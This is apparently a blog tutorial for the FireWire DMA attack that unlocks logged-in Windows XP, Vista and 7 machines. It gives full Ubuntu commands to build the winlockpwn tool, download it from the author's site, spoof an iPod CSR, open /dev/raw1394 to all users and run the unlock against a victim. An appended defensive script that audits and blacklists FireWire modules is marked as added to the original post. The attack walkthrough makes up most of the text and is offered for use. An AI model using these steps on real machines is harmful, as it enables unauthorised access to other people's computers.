Update: I’ve released a tool at github called Inception, which uses libforensic1394 to unlock Windows XP, Vista and Windows 7 boxes. IMNSHO, it is much more stable than winlockpwn, easier to use and works against a wider spectrum of target operating systems.

Quite regularly I’m being asked to demonstrate the FireWire attack made by MetlStorm aka Adam Boileau (http://www.storm.net.nz/projects/16 [site down as of May 20]), where an attacker unlocks a Windows machine by writing to the victim machine’s memory via FireWire. It’s kind of a party trick hack, but it never ceases to amaze people. A couple of days ago I demonstrated the trick at AFSecurity, and I was asked if it was easy to find a good description of how to do it.

Well, sort of. There’s an excellent guide here, but several of the commands do not work out of the box on Ubuntu anymore, so I’ve created this little tutorial. All hail to Tim for creating the original. Also, the original source of the tool has disappeared from the net, so I’ve started hosting my own version of the tool right here. Metlstorm, if you read this, apologies in advance. Let me buy you a beer sometime! Or get your site up again :-)

So here’s how to do the hack on Ubuntu 10.10 (Maverick Meerkat) (this guide was originally written for Ubuntu 11.04 (Natty Narwhal); see the update below):

(Update: According to this thread, the raw1394 device is no longer supported as of Ubuntu 11.04. I’ll try to figure out how to use the tool with the new FireWire stack (JuJu).)

Get the dependencies

First, get the stuff we need to be able to compile the winlockpwn tool and necessary FireWire driver:

sudo apt-get install build-essential linux-headers-$(uname -r) libdc1394-22 libraw1394-dev swig

Secondly, we need to download and compile Python 2.3:

wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar xvfz Python-2.3.6.tgz
cd Python-2.3.6
./configure

Now, since this old Python version has several potential buffer overflow vulnerabilities, the stack protector and FORTIFY_SOURCE checks that modern gcc enables by default will break the build, so we have to tell gcc to quietly ignore them by editing the Makefile. Open the Makefile in your favourite text editor, and change the following line:

BASECFLAGS=      -fno-strict-aliasing

To:

BASECFLAGS=      -fno-strict-aliasing -fno-stack-protector -U_FORTIFY_SOURCE

Then compile and make an alternative install (that will make the new (old) python libraries co-reside nicely with your existing python libraries):

make
sudo make altinstall

Fix up the libraw1394 header:

sudo vim /usr/include/libraw1394/raw1394.h

Search for and comment out every occurrence of ‘__attribute__ ((deprecated));’. Since that line carried the semicolon that terminated each declaration, be sure to put an ending semicolon on the previous line.

Download and install winlockpwn

Since Adam Boileau’s site is down, I’ve taken the liberty of hosting the tool files here. I’ve also added some more CSR files and signatures for Windows XP SP3, Vista 32 and 64-bit, Ubuntu 9.04 and Windows 7 32 and 64-bit. Woohoo!

wget http://www.breaknenter.org/files/winlockpwn/pythonraw1394-1.0.tar.gz
tar xvfz pythonraw1394-1.0.tar.gz
cd pythonraw1394
wget http://www.breaknenter.org/files/winlockpwn/winlockpwn
chmod +x ./winlockpwn
vim Makefile    # point the python path at /usr/local/bin/python2.3 instead of /usr
make

Unload the default Ubuntu FireWire drivers and load your own:

sudo modprobe -r firewire_ohci
sudo modprobe -r firewire_core
sudo modprobe ohci1394
sudo modprobe raw1394

Give write permissions to the firewire device:

sudo chmod 666 /dev/raw1394

Edit the first line (the interpreter line) of the files romtool, businfo and winlockpwn to reference the Python 2.3 interpreter installed above (/usr/local/bin/python2.3), then load the iPod image (or any of the other CSR files) onto the FireWire port:

sudo ./romtool -s 0 ipod.csr

Run businfo to check the port configurations:

sudo ./businfo

Check the node list. Node 0 is the Windows machine, node 1 should be the fake iPod. Connect to the Windows machine using a FireWire cable, and watch as Windows loads the FireWire drivers, recognizes the iPod and gives it DMA. At last, run winlockpwn (example parameters below):

sudo ./winlockpwn 0 0 2

You can get a quick explanation of the winlockpwn parameters by running the command without parameters. If you’re having trouble getting DMA access, try some of the other ROM CSR files. Also, verify that no FireWire drivers other than the ones loaded above are present by issuing the following commands:

lsmod | grep 1394
lsmod | grep firewire
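The same lsmod check is useful from the other side of the cable: an administrator who wants to know whether a Linux box is exposed to this kind of DMA attack needs to confirm that no FireWire stack is loaded and that it cannot be hot-loaded later. The script below is an added example, not part of the original post or of the winlockpwn tool. It reuses the module names the post itself mentions (firewire_ohci, firewire_core, ohci1394, raw1394) and adds the SBP-2 storage module of each stack; the function names are my own, and the modprobe.d fragment it prints follows the usual blacklist/install pattern rather than any distribution-specific file.

```shell
#!/bin/sh
# Added defensive audit helper (not from the original post): reports loaded
# FireWire kernel modules and prints a modprobe.d fragment that keeps both the
# old (ohci1394/raw1394) and the new "JuJu" (firewire_*) stacks from loading.

# firewire_modules_from_lsmod: reads lsmod-style text on stdin and prints the
# module name of every row that belongs to a FireWire stack, one per line.
# The header row is skipped; matching is by name prefix "firewire_" or suffix "1394".
firewire_modules_from_lsmod() {
    awk 'NR > 1 && ($1 ~ /^firewire_/ || $1 ~ /1394$/) { print $1 }'
}

# firewire_modules_loaded: the same check against the running kernel.
firewire_modules_loaded() {
    lsmod | firewire_modules_from_lsmod
}

# firewire_blacklist_conf: prints modprobe.d lines that blacklist the modules and
# map their "install" action to /bin/true, so neither explicit modprobe nor
# hotplug can load them. Save as /etc/modprobe.d/no-firewire.conf (as root)
# and rebuild the initramfs so the setting also holds at boot.
firewire_blacklist_conf() {
    for m in firewire_ohci firewire_core firewire_sbp2 ohci1394 raw1394 sbp2; do
        printf 'blacklist %s\ninstall %s /bin/true\n' "$m" "$m"
    done
}

# firewire_audit: human-readable report. Returns 1 if any FireWire module is
# loaded or if the raw1394 device node exists, 0 if the host looks closed.
firewire_audit() {
    status=0
    loaded=$(firewire_modules_loaded)
    if [ -n "$loaded" ]; then
        printf 'FireWire modules loaded (DMA exposure):\n%s\n' "$loaded"
        status=1
    else
        printf 'No FireWire stack modules loaded.\n'
    fi
    if [ -e /dev/raw1394 ]; then
        # The post chmods this node to 666; world-writable here means any local
        # user can issue bus transactions.
        printf 'raw1394 device node present: '
        ls -l /dev/raw1394
        status=1
    fi
    return "$status"
}

# Run the audit only when invoked as "sh thisfile.sh audit"; sourcing the file
# just defines the functions.
if [ "${1:-}" = "audit" ]; then
    firewire_audit
fi
```

Run `sh firewire-audit.sh audit` for the report, or source the file and pipe saved lsmod output through `firewire_modules_from_lsmod` to audit a captured listing offline. Blacklisting the modules is the cheap mitigation; on hardware with an IOMMU, enabling it in the BIOS and kernel is the one that actually stops an attached device from reading memory.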
